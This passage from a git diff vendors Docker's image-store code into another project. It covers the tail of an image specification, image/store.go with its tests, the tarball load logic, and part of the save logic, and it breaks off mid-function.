+Unpacking a bundle of image layer JSON files and their corresponding filesystem +changesets can be done using a series of steps: + +1. Follow the parent IDs of image layers to find the root ancestor (an image +with no parent ID specified). +2. For every image layer, in order from root ancestor and descending down, +extract the contents of that layer's filesystem changeset archive into a +directory which will be used as the root of a container filesystem. + + - Extract all contents of each archive. + - Walk the directory tree once more, removing any files with the prefix + `.wh.` and the corresponding file or directory named without this prefix. 
+ + +## Implementations + +This specification is an admittedly imperfect description of an +imperfectly-understood problem. The Docker project is, in turn, an attempt to +implement this specification. Our goal and our execution toward it will evolve +over time, but our primary concern in this specification and in our +implementation is compatibility and interoperability. diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go new file mode 100644 index 0000000000..b61c456097 --- /dev/null +++ b/vendor/github.com/docker/docker/image/store.go @@ -0,0 +1,295 @@ +package image + +import ( + "encoding/json" + "errors" + "fmt" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +// Store is an interface for creating and accessing images +type Store interface { + Create(config []byte) (ID, error) + Get(id ID) (*Image, error) + Delete(id ID) ([]layer.Metadata, error) + Search(partialID string) (ID, error) + SetParent(id ID, parent ID) error + GetParent(id ID) (ID, error) + Children(id ID) []ID + Map() map[ID]*Image + Heads() map[ID]*Image +} + +// LayerGetReleaser is a minimal interface for getting and releasing images. 
+type LayerGetReleaser interface { + Get(layer.ChainID) (layer.Layer, error) + Release(layer.Layer) ([]layer.Metadata, error) +} + +type imageMeta struct { + layer layer.Layer + children map[ID]struct{} +} + +type store struct { + sync.Mutex + ls LayerGetReleaser + images map[ID]*imageMeta + fs StoreBackend + digestSet *digest.Set +} + +// NewImageStore returns new store object for given layer store +func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) { + is := &store{ + ls: ls, + images: make(map[ID]*imageMeta), + fs: fs, + digestSet: digest.NewSet(), + } + + // load all current images and retain layers + if err := is.restore(); err != nil { + return nil, err + } + + return is, nil +} + +func (is *store) restore() error { + err := is.fs.Walk(func(dgst digest.Digest) error { + img, err := is.Get(IDFromDigest(dgst)) + if err != nil { + logrus.Errorf("invalid image %v, %v", dgst, err) + return nil + } + var l layer.Layer + if chainID := img.RootFS.ChainID(); chainID != "" { + l, err = is.ls.Get(chainID) + if err != nil { + return err + } + } + if err := is.digestSet.Add(dgst); err != nil { + return err + } + + imageMeta := &imageMeta{ + layer: l, + children: make(map[ID]struct{}), + } + + is.images[IDFromDigest(dgst)] = imageMeta + + return nil + }) + if err != nil { + return err + } + + // Second pass to fill in children maps + for id := range is.images { + if parent, err := is.GetParent(id); err == nil { + if parentMeta := is.images[parent]; parentMeta != nil { + parentMeta.children[id] = struct{}{} + } + } + } + + return nil +} + +func (is *store) Create(config []byte) (ID, error) { + var img Image + err := json.Unmarshal(config, &img) + if err != nil { + return "", err + } + + // Must reject any config that references diffIDs from the history + // which aren't among the rootfs layers. 
+ rootFSLayers := make(map[layer.DiffID]struct{}) + for _, diffID := range img.RootFS.DiffIDs { + rootFSLayers[diffID] = struct{}{} + } + + layerCounter := 0 + for _, h := range img.History { + if !h.EmptyLayer { + layerCounter++ + } + } + if layerCounter > len(img.RootFS.DiffIDs) { + return "", errors.New("too many non-empty layers in History section") + } + + dgst, err := is.fs.Set(config) + if err != nil { + return "", err + } + imageID := IDFromDigest(dgst) + + is.Lock() + defer is.Unlock() + + if _, exists := is.images[imageID]; exists { + return imageID, nil + } + + layerID := img.RootFS.ChainID() + + var l layer.Layer + if layerID != "" { + l, err = is.ls.Get(layerID) + if err != nil { + return "", err + } + } + + imageMeta := &imageMeta{ + layer: l, + children: make(map[ID]struct{}), + } + + is.images[imageID] = imageMeta + if err := is.digestSet.Add(imageID.Digest()); err != nil { + delete(is.images, imageID) + return "", err + } + + return imageID, nil +} + +func (is *store) Search(term string) (ID, error) { + is.Lock() + defer is.Unlock() + + dgst, err := is.digestSet.Lookup(term) + if err != nil { + if err == digest.ErrDigestNotFound { + err = fmt.Errorf("No such image: %s", term) + } + return "", err + } + return IDFromDigest(dgst), nil +} + +func (is *store) Get(id ID) (*Image, error) { + // todo: Check if image is in images + // todo: Detect manual insertions and start using them + config, err := is.fs.Get(id.Digest()) + if err != nil { + return nil, err + } + + img, err := NewFromJSON(config) + if err != nil { + return nil, err + } + img.computedID = id + + img.Parent, err = is.GetParent(id) + if err != nil { + img.Parent = "" + } + + return img, nil +} + +func (is *store) Delete(id ID) ([]layer.Metadata, error) { + is.Lock() + defer is.Unlock() + + imageMeta := is.images[id] + if imageMeta == nil { + return nil, fmt.Errorf("unrecognized image ID %s", id.String()) + } + for id := range imageMeta.children { + is.fs.DeleteMetadata(id.Digest(), 
"parent") + } + if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil { + delete(is.images[parent].children, id) + } + + if err := is.digestSet.Remove(id.Digest()); err != nil { + logrus.Errorf("error removing %s from digest set: %q", id, err) + } + delete(is.images, id) + is.fs.Delete(id.Digest()) + + if imageMeta.layer != nil { + return is.ls.Release(imageMeta.layer) + } + return nil, nil +} + +func (is *store) SetParent(id, parent ID) error { + is.Lock() + defer is.Unlock() + parentMeta := is.images[parent] + if parentMeta == nil { + return fmt.Errorf("unknown parent image ID %s", parent.String()) + } + if parent, err := is.GetParent(id); err == nil && is.images[parent] != nil { + delete(is.images[parent].children, id) + } + parentMeta.children[id] = struct{}{} + return is.fs.SetMetadata(id.Digest(), "parent", []byte(parent)) +} + +func (is *store) GetParent(id ID) (ID, error) { + d, err := is.fs.GetMetadata(id.Digest(), "parent") + if err != nil { + return "", err + } + return ID(d), nil // todo: validate? 
+} + +func (is *store) Children(id ID) []ID { + is.Lock() + defer is.Unlock() + + return is.children(id) +} + +func (is *store) children(id ID) []ID { + var ids []ID + if is.images[id] != nil { + for id := range is.images[id].children { + ids = append(ids, id) + } + } + return ids +} + +func (is *store) Heads() map[ID]*Image { + return is.imagesMap(false) +} + +func (is *store) Map() map[ID]*Image { + return is.imagesMap(true) +} + +func (is *store) imagesMap(all bool) map[ID]*Image { + is.Lock() + defer is.Unlock() + + images := make(map[ID]*Image) + + for id := range is.images { + if !all && len(is.children(id)) > 0 { + continue + } + img, err := is.Get(id) + if err != nil { + logrus.Errorf("invalid image access: %q, error: %q", id, err) + continue + } + images[id] = img + } + return images +} diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go new file mode 100644 index 0000000000..50f8aa8b84 --- /dev/null +++ b/vendor/github.com/docker/docker/image/store_test.go @@ -0,0 +1,300 @@ +package image + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +func TestRestore(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id1, err := fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + _, err = fs.Set([]byte(`invalid`)) + if err != nil { + t.Fatal(err) + } + id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + err = fs.SetMetadata(id2, "parent", []byte(id1)) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { 
+ t.Fatal(err) + } + + imgs := is.Map() + if actual, expected := len(imgs), 2; actual != expected { + t.Fatalf("invalid images length, expected 2, got %q", len(imgs)) + } + + img1, err := is.Get(ID(id1)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img1.computedID, ID(id1); actual != expected { + t.Fatalf("invalid image ID: expected %q, got %q", expected, actual) + } + + if actual, expected := img1.computedID.String(), string(id1); actual != expected { + t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual) + } + + img2, err := is.Get(ID(id2)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img1.Comment, "abc"; actual != expected { + t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual) + } + + if actual, expected := img2.Comment, "def"; actual != expected { + t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual) + } + + p, err := is.GetParent(ID(id1)) + if err == nil { + t.Fatal("expected error for getting parent") + } + + p, err = is.GetParent(ID(id2)) + if err != nil { + t.Fatal(err) + } + if actual, expected := p, ID(id1); actual != expected { + t.Fatalf("invalid parent: expected %q, got %q", expected, actual) + } + + children := is.Children(ID(id1)) + if len(children) != 1 { + t.Fatalf("invalid children length: %q", len(children)) + } + if actual, expected := children[0], ID(id2); actual != expected { + t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual) + } + + heads := is.Heads() + if actual, expected := len(heads), 1; actual != expected { + t.Fatalf("invalid images length: expected %q, got %q", expected, actual) + } + + sid1, err := is.Search(string(id1)[:10]) + if err != nil { + t.Fatal(err) + } + if actual, expected := sid1, ID(id1); actual != expected { + t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) + } + + sid1, err = is.Search(digest.Digest(id1).Hex()[:6]) + if err != nil { + t.Fatal(err) + } + if 
actual, expected := sid1, ID(id1); actual != expected { + t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) + } + + invalidPattern := digest.Digest(id1).Hex()[1:6] + _, err = is.Search(invalidPattern) + if err == nil { + t.Fatalf("expected search for %q to fail", invalidPattern) + } + +} + +func TestAddDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + + if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected { + t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual) + } + + img, err := is.Get(id1) + if err != nil { + t.Fatal(err) + } + + if actual, expected := img.Comment, "abc"; actual != expected { + t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual) + } + + id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) + if err != nil { + t.Fatal(err) + } + + err = is.SetParent(id2, id1) + if err != nil { + t.Fatal(err) + } + + pid1, err := is.GetParent(id2) + if err != nil { + t.Fatal(err) + } + if actual, expected := pid1, id1; actual != expected { + t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual) + } + + _, err = is.Delete(id1) + if err != nil { + t.Fatal(err) + } + _, err = is.Get(id1) + if err == nil { + t.Fatalf("expected get for deleted image %q to fail", id1) + } + _, err = is.Get(id2) + if err != nil { + t.Fatal(err) + } + pid1, err = 
is.GetParent(id2) + if err == nil { + t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1) + } + +} + +func TestSearchAfterDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id1, err := is.Search(string(id)[:15]) + if err != nil { + t.Fatal(err) + } + + if actual, expected := id1, id; expected != actual { + t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual) + } + + if _, err := is.Delete(id); err != nil { + t.Fatal(err) + } + + if _, err := is.Search(string(id)[:15]); err == nil { + t.Fatal("expected search after deletion to fail") + } +} + +func TestParentReset(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + is, err := NewImageStore(fs, &mockLayerGetReleaser{}) + if err != nil { + t.Fatal(err) + } + + id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id2, err := is.Create([]byte(`{"comment": "abc2", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`)) + if err != nil { + t.Fatal(err) + } + + if err := is.SetParent(id, id2); err != nil { + t.Fatal(err) + } + + ids := is.Children(id2) + if actual, expected := len(ids), 1; expected != actual { + t.Fatalf("wrong number of children: %d, got %d", expected, actual) + } + + if err := is.SetParent(id, id3); err != nil { + t.Fatal(err) + } + + ids = 
is.Children(id2) + if actual, expected := len(ids), 0; expected != actual { + t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) + } + + ids = is.Children(id3) + if actual, expected := len(ids), 1; expected != actual { + t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) + } + +} + +type mockLayerGetReleaser struct{} + +func (ls *mockLayerGetReleaser) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +func (ls *mockLayerGetReleaser) Release(layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go new file mode 100644 index 0000000000..01edd91fb7 --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/load.go @@ -0,0 +1,390 @@ +package tarexport + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/reference" +) + +func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + var ( + sf = streamformatter.NewJSONStreamFormatter() + progressOutput progress.Output + ) + if !quiet { + progressOutput = sf.NewProgressOutput(outStream, false) + } + outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()} + + tmpDir, err := ioutil.TempDir("", "docker-import-") + if err != nil { 
+ return err + } + defer os.RemoveAll(tmpDir) + + if err := chrootarchive.Untar(inTar, tmpDir, nil); err != nil { + return err + } + // read manifest, if no file then load in legacy mode + manifestPath, err := safePath(tmpDir, manifestFileName) + if err != nil { + return err + } + manifestFile, err := os.Open(manifestPath) + if err != nil { + if os.IsNotExist(err) { + return l.legacyLoad(tmpDir, outStream, progressOutput) + } + return err + } + defer manifestFile.Close() + + var manifest []manifestItem + if err := json.NewDecoder(manifestFile).Decode(&manifest); err != nil { + return err + } + + var parentLinks []parentLink + var imageIDsStr string + var imageRefCount int + + for _, m := range manifest { + configPath, err := safePath(tmpDir, m.Config) + if err != nil { + return err + } + config, err := ioutil.ReadFile(configPath) + if err != nil { + return err + } + img, err := image.NewFromJSON(config) + if err != nil { + return err + } + var rootFS image.RootFS + rootFS = *img.RootFS + rootFS.DiffIDs = nil + + if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual { + return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual) + } + + for i, diffID := range img.RootFS.DiffIDs { + layerPath, err := safePath(tmpDir, m.Layers[i]) + if err != nil { + return err + } + r := rootFS + r.Append(diffID) + newLayer, err := l.ls.Get(r.ChainID()) + if err != nil { + newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput) + if err != nil { + return err + } + } + defer layer.ReleaseAndLog(l.ls, newLayer) + if expected, actual := diffID, newLayer.DiffID(); expected != actual { + return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual) + } + rootFS.Append(diffID) + } + + imgID, err := l.is.Create(config) + if err != nil { + return err + } + imageIDsStr += fmt.Sprintf("Loaded image ID: %s\n", imgID) + + imageRefCount = 0 + for _, 
repoTag := range m.RepoTags { + named, err := reference.ParseNamed(repoTag) + if err != nil { + return err + } + ref, ok := named.(reference.NamedTagged) + if !ok { + return fmt.Errorf("invalid tag %q", repoTag) + } + l.setLoadedTag(ref, imgID.Digest(), outStream) + outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref))) + imageRefCount++ + } + + parentLinks = append(parentLinks, parentLink{imgID, m.Parent}) + l.loggerImgEvent.LogImageEvent(imgID.String(), imgID.String(), "load") + } + + for _, p := range validatedParentLinks(parentLinks) { + if p.parentID != "" { + if err := l.setParentID(p.id, p.parentID); err != nil { + return err + } + } + } + + if imageRefCount == 0 { + outStream.Write([]byte(imageIDsStr)) + } + + return nil +} + +func (l *tarexporter) setParentID(id, parentID image.ID) error { + img, err := l.is.Get(id) + if err != nil { + return err + } + parent, err := l.is.Get(parentID) + if err != nil { + return err + } + if !checkValidParent(img, parent) { + return fmt.Errorf("image %v is not a valid parent for %v", parent.ID(), img.ID()) + } + return l.is.SetParent(id, parentID) +} + +func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { + // We use system.OpenSequential to use sequential file access on Windows, avoiding + // depleting the standby list. On Linux, this equates to a regular os.Open. 
+ rawTar, err := system.OpenSequential(filename) + if err != nil { + logrus.Debugf("Error reading embedded tar: %v", err) + return nil, err + } + defer rawTar.Close() + + var r io.Reader + if progressOutput != nil { + fileInfo, err := rawTar.Stat() + if err != nil { + logrus.Debugf("Error statting file: %v", err) + return nil, err + } + + r = progress.NewProgressReader(rawTar, progressOutput, fileInfo.Size(), stringid.TruncateID(id), "Loading layer") + } else { + r = rawTar + } + + inflatedLayerData, err := archive.DecompressStream(r) + if err != nil { + return nil, err + } + defer inflatedLayerData.Close() + + if ds, ok := l.ls.(layer.DescribableStore); ok { + return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc) + } + return l.ls.Register(inflatedLayerData, rootFS.ChainID()) +} + +func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error { + if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID { + fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags + } + + if err := l.rs.AddTag(ref, imgID, true); err != nil { + return err + } + return nil +} + +func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error { + legacyLoadedMap := make(map[string]image.ID) + + dirs, err := ioutil.ReadDir(tmpDir) + if err != nil { + return err + } + + // every dir represents an image + for _, d := range dirs { + if d.IsDir() { + if err := l.legacyLoadImage(d.Name(), tmpDir, legacyLoadedMap, progressOutput); err != nil { + return err + } + } + } + + // load tags from repositories file + repositoriesPath, err := safePath(tmpDir, legacyRepositoriesFileName) + if err != nil { + return err + } + repositoriesFile, err := os.Open(repositoriesPath) + if err != nil { + return err + } + defer repositoriesFile.Close() + + 
repositories := make(map[string]map[string]string) + if err := json.NewDecoder(repositoriesFile).Decode(&repositories); err != nil { + return err + } + + for name, tagMap := range repositories { + for tag, oldID := range tagMap { + imgID, ok := legacyLoadedMap[oldID] + if !ok { + return fmt.Errorf("invalid target ID: %v", oldID) + } + named, err := reference.WithName(name) + if err != nil { + return err + } + ref, err := reference.WithTag(named, tag) + if err != nil { + return err + } + l.setLoadedTag(ref, imgID.Digest(), outStream) + } + } + + return nil +} + +func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[string]image.ID, progressOutput progress.Output) error { + if _, loaded := loadedMap[oldID]; loaded { + return nil + } + configPath, err := safePath(sourceDir, filepath.Join(oldID, legacyConfigFileName)) + if err != nil { + return err + } + imageJSON, err := ioutil.ReadFile(configPath) + if err != nil { + logrus.Debugf("Error reading json: %v", err) + return err + } + + var img struct{ Parent string } + if err := json.Unmarshal(imageJSON, &img); err != nil { + return err + } + + var parentID image.ID + if img.Parent != "" { + for { + var loaded bool + if parentID, loaded = loadedMap[img.Parent]; !loaded { + if err := l.legacyLoadImage(img.Parent, sourceDir, loadedMap, progressOutput); err != nil { + return err + } + } else { + break + } + } + } + + // todo: try to connect with migrate code + rootFS := image.NewRootFS() + var history []image.History + + if parentID != "" { + parentImg, err := l.is.Get(parentID) + if err != nil { + return err + } + + rootFS = parentImg.RootFS + history = parentImg.History + } + + layerPath, err := safePath(sourceDir, filepath.Join(oldID, legacyLayerFileName)) + if err != nil { + return err + } + newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput) + if err != nil { + return err + } + rootFS.Append(newLayer.DiffID()) + + h, err := 
v1.HistoryFromConfig(imageJSON, false) + if err != nil { + return err + } + history = append(history, h) + + config, err := v1.MakeConfigFromV1Config(imageJSON, rootFS, history) + if err != nil { + return err + } + imgID, err := l.is.Create(config) + if err != nil { + return err + } + + metadata, err := l.ls.Release(newLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return err + } + + if parentID != "" { + if err := l.is.SetParent(imgID, parentID); err != nil { + return err + } + } + + loadedMap[oldID] = imgID + return nil +} + +func safePath(base, path string) (string, error) { + return symlink.FollowSymlinkInScope(filepath.Join(base, path), base) +} + +type parentLink struct { + id, parentID image.ID +} + +func validatedParentLinks(pl []parentLink) (ret []parentLink) { +mainloop: + for i, p := range pl { + ret = append(ret, p) + for _, p2 := range pl { + if p2.id == p.parentID && p2.id != p.id { + continue mainloop + } + } + ret[i].parentID = "" + } + return +} + +func checkValidParent(img, parent *image.Image) bool { + if len(img.History) == 0 && len(parent.History) == 0 { + return true // having history is not mandatory + } + if len(img.History)-len(parent.History) != 1 { + return false + } + for i, h := range parent.History { + if !reflect.DeepEqual(h, img.History[i]) { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go new file mode 100644 index 0000000000..6e3a5bc589 --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/save.go @@ -0,0 +1,355 @@ +package tarexport + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + 
"github.com/docker/docker/pkg/system" + "github.com/docker/docker/reference" +) + +type imageDescriptor struct { + refs []reference.NamedTagged + layers []string +} + +type saveSession struct { + *tarexporter + outDir string + images map[image.ID]*imageDescriptor + savedLayers map[string]struct{} + diffIDPaths map[layer.DiffID]string // cache every diffID blob to avoid duplicates +} + +func (l *tarexporter) Save(names []string, outStream io.Writer) error { + images, err := l.parseNames(names) + if err != nil { + return err + } + + return (&saveSession{tarexporter: l, images: images}).save(outStream) +} + +func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) { + imgDescr := make(map[image.ID]*imageDescriptor) + + addAssoc := func(id image.ID, ref reference.Named) { + if _, ok := imgDescr[id]; !ok { + imgDescr[id] = &imageDescriptor{} + } + + if ref != nil { + var tagged reference.NamedTagged + if _, ok := ref.(reference.Canonical); ok { + return + } + var ok bool + if tagged, ok = ref.(reference.NamedTagged); !ok { + var err error + if tagged, err = reference.WithTag(ref, reference.DefaultTag); err != nil { + return + } + } + + for _, t := range imgDescr[id].refs { + if tagged.String() == t.String() { + return + } + } + imgDescr[id].refs = append(imgDescr[id].refs, tagged) + } + } + + for _, name := range names { + id, ref, err := reference.ParseIDOrReference(name) + if err != nil { + return nil, err + } + if id != "" { + _, err := l.is.Get(image.IDFromDigest(id)) + if err != nil { + return nil, err + } + addAssoc(image.IDFromDigest(id), nil) + continue + } + if ref.Name() == string(digest.Canonical) { + imgID, err := l.is.Search(name) + if err != nil { + return nil, err + } + addAssoc(imgID, nil) + continue + } + if reference.IsNameOnly(ref) { + assocs := l.rs.ReferencesByName(ref) + for _, assoc := range assocs { + addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref) + } + if len(assocs) == 0 { + imgID, err := l.is.Search(name) + if 
err != nil { + return nil, err + } + addAssoc(imgID, nil) + } + continue + } + id, err = l.rs.Get(ref) + if err != nil { + return nil, err + } + addAssoc(image.IDFromDigest(id), ref) + + } + return imgDescr, nil +} + +func (s *saveSession) save(outStream io.Writer) error { + s.savedLayers = make(map[string]struct{}) + s.diffIDPaths = make(map[layer.DiffID]string) + + // get image json + tempDir, err := ioutil.TempDir("", "docker-export-") + if err != nil { + return err + } + defer os.RemoveAll(tempDir) + + s.outDir = tempDir + reposLegacy := make(map[string]map[string]string) + + var manifest []manifestItem + var parentLinks []parentLink + + for id, imageDescr := range s.images { + foreignSrcs, err := s.saveImage(id) + if err != nil { + return err + } + + var repoTags []string + var layers []string + + for _, ref := range imageDescr.refs { + if _, ok := reposLegacy[ref.Name()]; !ok { + reposLegacy[ref.Name()] = make(map[string]string) + } + reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] + repoTags = append(repoTags, ref.String()) + } + + for _, l := range imageDescr.layers { + layers = append(layers, filepath.Join(l, legacyLayerFileName)) + } + + manifest = append(manifest, manifestItem{ + Config: id.Digest().Hex() + ".json", + RepoTags: repoTags, + Layers: layers, + LayerSources: foreignSrcs, + }) + + parentID, _ := s.is.GetParent(id) + parentLinks = append(parentLinks, parentLink{id, parentID}) + s.tarexporter.loggerImgEvent.LogImageEvent(id.String(), id.String(), "save") + } + + for i, p := range validatedParentLinks(parentLinks) { + if p.parentID != "" { + manifest[i].Parent = p.parentID + } + } + + if len(reposLegacy) > 0 { + reposFile := filepath.Join(tempDir, legacyRepositoriesFileName) + rf, err := os.OpenFile(reposFile, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + return err + } + + if err := json.NewEncoder(rf).Encode(reposLegacy); err != nil { + rf.Close() + return err + } + + rf.Close() + + if err := 
system.Chtimes(reposFile, time.Unix(0, 0), time.Unix(0, 0)); err != nil { + return err + } + } + + manifestFileName := filepath.Join(tempDir, manifestFileName) + f, err := os.OpenFile(manifestFileName, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644) + if err != nil { + return err + } + + if err := json.NewEncoder(f).Encode(manifest); err != nil { + f.Close() + return err + } + + f.Close() + + if err := system.Chtimes(manifestFileName, time.Unix(0, 0), time.Unix(0, 0)); err != nil { + return err + } + + fs, err := archive.Tar(tempDir, archive.Uncompressed) + if err != nil { + return err + } + defer fs.Close() + + if _, err := io.Copy(outStream, fs); err != nil { + return err + } + return nil +} + +func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) { + img, err := s.is.Get(id) + if err != nil { + return nil, err + } + + if len(img.RootFS.DiffIDs) == 0 { + return nil, fmt.Errorf("empty export - not implemented") + } + + var parent digest.Digest + var layers []string + var foreignSrcs map[layer.DiffID]distribution.Descriptor + for i := range img.RootFS.DiffIDs { + v1Img := image.V1Image{ + Created: img.Created, + } + if i == len(img.RootFS.DiffIDs)-1 { + v1Img = img.V1Image + } + rootFS := *img.RootFS + rootFS.DiffIDs = rootFS.DiffIDs[:i+1] + v1ID, err := v1.CreateID(v1Img, rootFS.ChainID(), parent) + if err != nil { + return nil, err + } + + v1Img.ID = v1ID.Hex() + if parent != "" { + v1Img.Parent = parent.Hex() + } + + src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created) + if err != nil { + return nil, err + } + layers = append(layers, v1Img.ID) + parent = v1ID + if src.Digest != "" { + if foreignSrcs == nil { + foreignSrcs = make(map[layer.DiffID]distribution.Descriptor) + } + foreignSrcs[img.RootFS.DiffIDs[i]] = src + } + } + + configFile := filepath.Join(s.outDir, id.Digest().Hex()+".json") + if err := ioutil.WriteFile(configFile, img.RawJSON(), 0644); err != nil { + return nil, err + } + if err := 
system.Chtimes(configFile, img.Created, img.Created); err != nil { + return nil, err + } + + s.images[id].layers = layers + return foreignSrcs, nil +} + +func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, createdTime time.Time) (distribution.Descriptor, error) { + if _, exists := s.savedLayers[legacyImg.ID]; exists { + return distribution.Descriptor{}, nil + } + + outDir := filepath.Join(s.outDir, legacyImg.ID) + if err := os.Mkdir(outDir, 0755); err != nil { + return distribution.Descriptor{}, err + } + + // todo: why is this version file here? + if err := ioutil.WriteFile(filepath.Join(outDir, legacyVersionFileName), []byte("1.0"), 0644); err != nil { + return distribution.Descriptor{}, err + } + + imageConfig, err := json.Marshal(legacyImg) + if err != nil { + return distribution.Descriptor{}, err + } + + if err := ioutil.WriteFile(filepath.Join(outDir, legacyConfigFileName), imageConfig, 0644); err != nil { + return distribution.Descriptor{}, err + } + + // serialize filesystem + layerPath := filepath.Join(outDir, legacyLayerFileName) + l, err := s.ls.Get(id) + if err != nil { + return distribution.Descriptor{}, err + } + defer layer.ReleaseAndLog(s.ls, l) 